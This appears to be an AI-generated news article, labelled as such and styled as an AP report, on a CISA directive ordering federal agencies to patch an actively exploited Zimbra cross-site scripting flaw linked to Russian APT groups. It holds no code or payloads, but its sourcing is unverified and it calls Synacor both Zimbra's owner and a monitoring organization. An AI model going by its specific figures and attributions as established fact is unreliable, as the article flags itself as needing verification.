CISA Orders Federal Agencies to Patch Critical Zimbra Vulnerability Amid Active Exploitation
AI-generated from multiple sources. Verify before acting on this reporting.
WASHINGTON (AP) — The Cybersecurity and Infrastructure Security Agency has issued an emergency directive ordering federal agencies to patch a critical vulnerability in Zimbra Collaboration Suite servers within 72 hours, warning that the flaw is being actively exploited by Russian cyberespionage groups.
More than 10,000 Zimbra servers worldwide remain exposed to a cross-site scripting attack exploiting CVE-2025-48700, which allows unauthenticated attackers to inject malicious JavaScript into email sessions. The vulnerability grants access to sensitive information without requiring user credentials. CISA identified the threat as actively exploited and elevated the urgency of the patching order to prevent data breaches across government networks.
Shadowserver and Synacor, cybersecurity monitoring organizations, confirmed the widespread nature of the exposure. Their data indicates that the vulnerable servers are concentrated primarily in Asia and Europe, though the threat is global. The attack vector targets unpatched installations of the collaboration software, which is widely used by enterprises and government entities for email and calendar management.
The vulnerability has been linked to APT28 and APT29, two advanced persistent threat groups associated with Russian state-sponsored cyberespionage. These groups have a history of targeting government and corporate infrastructure to steal intelligence and disrupt operations. The current campaign appears to leverage the unpatched Zimbra servers to establish footholds in targeted networks.
Zimbra, owned by Synacor, has released a patch to address the flaw, but adoption remains low across the global server landscape. The delay in patching leaves organizations vulnerable to data theft and potential network compromise. CISA’s directive mandates immediate action, requiring federal agencies to verify patch deployment and report compliance within the three-day window.
The attack method involves injecting malicious scripts into email sessions, which execute when users access their inboxes. This technique bypasses traditional authentication measures, allowing attackers to extract sensitive data or deploy additional malware. The simplicity of the exploit has made it a favorite among threat actors seeking quick access to high-value targets.
Cybersecurity experts warn that the widespread nature of the vulnerability could lead to significant data breaches if not addressed promptly. The concentration of vulnerable servers in Asia and Europe raises concerns about regional infrastructure stability and the potential for coordinated attacks on critical sectors.
As of now, it remains unclear how many organizations outside the federal government have successfully patched their systems. The ongoing exploitation suggests that threat actors are actively scanning for unpatched servers, increasing the risk of compromise for any entity running vulnerable versions of Zimbra. Federal agencies are under strict deadlines to mitigate the threat, but the global scale of the vulnerability presents a significant challenge for coordinated defense efforts.